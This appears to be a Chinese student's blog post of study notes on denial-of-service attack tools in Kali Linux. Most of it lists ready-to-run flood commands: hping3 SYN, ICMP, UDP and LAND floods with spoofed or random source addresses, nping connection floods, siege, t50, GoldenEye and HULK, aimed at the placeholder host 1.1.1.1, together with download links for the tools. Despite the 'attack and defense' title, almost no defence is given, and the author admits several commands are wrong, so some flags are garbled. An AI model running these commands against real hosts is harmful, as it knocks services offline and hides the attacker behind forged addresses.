DoS與DdoS攻防分析——其他拒絕服務攻擊攻防總結

其他拒絕服務攻擊攻防總結

哈哈哈雖然明兒考試但是！！！一天我不寫博客真滴睡不香！ 而且DoS留下一個小尾巴心裏不舒服，今兒感覺複習差不多，就抽點時間把這個課聽完了，這裏的代碼很多錯，沒有改完，之後做實驗再回來改，留個小坑

Kali自帶拒絕服務攻擊工具

Hping3

幾乎可以定製發送任何TCP/IP數據包，用於測試FW、端口掃描、性能測試

Syn Flood 攻擊

-hping3 -c 1000 -d 120 -S -w 64 -p 80 - -flood - -rand-source  1.1.1.1
			-hping3 -S -P -U -p 80 - -flood - -rand-source 1.1.1.1
			-hping3 -SARFUP -p 80 - -flood - -rand-source 1.1.1.1 (TCP Flood)

ICMP Flood 攻擊

-hping3 -q -n -a 1.1.1.1 - -icmp -d 56 - -flood 1.1.1.2

補充兩個參數 --rand-source 用公網隨機地址進行攻擊
-a 1.1.1.1 僞造成1.1.1.1進行攻擊
詳細幫助文檔：http://cnhotfire.blog.51cto.com/2042323/698362/

UDP Flood 攻擊

-hping3 -a 1.1.1.1 - -udp -s 53 -d 100 -p 53 - -flood 1.1.1.2

LAND攻擊

特殊種類的SYN Flood攻擊
源地址、目的地址都是受害者，受害者於自己完成三次握手

—hping3 -n –a 1.1.1.1 -S -d 100 -p 80 –flood 1.1.1.1

LAND攻者是僞造的源地址和要攻擊目標地址是同一個地址，也就是說自己與自己建立連接。可用tcpdump –I eth0 –s 0 –vv查看

TCP全鏈接DoS攻擊

nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1  
 //--rate=100000 一次建10000個連接，-C是一共建1000000000連接。

查公網IP

-nping - -echo-client "public" echo.nmap.org - -udp

Siege

-http/https壓力測試工具，模擬多個用戶併發訪問請求 —siege

- siege -g http://1.1.1.1/a.php       //掃描網站banner信息
		- siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp  -vv

同時攻擊多個url，使用-f調用字典文件 /etc/siege/urls.txt,也可以直接
編輯urls.txt把要攻擊的地址放進去直接使用siege –i –c 1000 -vv就可以攻擊
Siege攻擊一般用作併發量、性能測試，多用戶併發訪問測試。開發上線一般都會經過這步。
siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp //10000用戶併發， -A代表指紋信息，可隨便填定。
一般用golden eye代替，後面有

T50網絡壓力測試

• t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
  t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22

Nmap

-grep dos /usr/share/nmap/scripts/script.db |cut -d “”" -f 2

其他拒絕服務攻擊

XOIC

攻擊任意IP地址的指定端口
git clone git://git.code.sf.net/p/xoic/code xoic-code
https://xoicdoser.wordpress.com/
三種模式：test、normal、DoS Attack
支持協議：TCP/HTTP/UDP/ICMP

DDOSIM

7層拒絕服務工具（模擬多個殭屍機）
隨機IP地址 一基於TCP連接的攻擊 -應用層DDoS攻擊
正常的HTTP請求、非正常的HTTP請求式DDoS -SMTP DDoS
隨機端口的TCP連接洪水

GoldenEye

http/https拒絕服務攻擊工具
安全研究爲目的Python腳本
隨機攻擊向量，keep-alive，避免緩存命中

-wget https://github.com/jseidl/GoldenEye/archive/master.zip
			-unzip master.zip
			-./goldeneye.py http://1.1.1.1 -w 50 
			goldeneye.py http://1.1.1.1 -w 50 –m random    //-w 50 代表50個人 ，-s 500代表每個人500個，50*500打25000個鏈接。

HULK - Http Unbearable Load King

Python腳本
隨機產生大量唯一的地址請求，避免緩存命中 -耗盡WEB服務器資源池
https://packetstormsecurity.com/files/download/112856/hulk.zip

匿名者攻擊工具

匿名者發佈的一些DoS工具
LOIC
HOIC
DDoSer
他們招募志願者發放以上工具
以上DoS工具不隱藏真實IP地址
PS.我啥時候能有個黑客團體呢 哈哈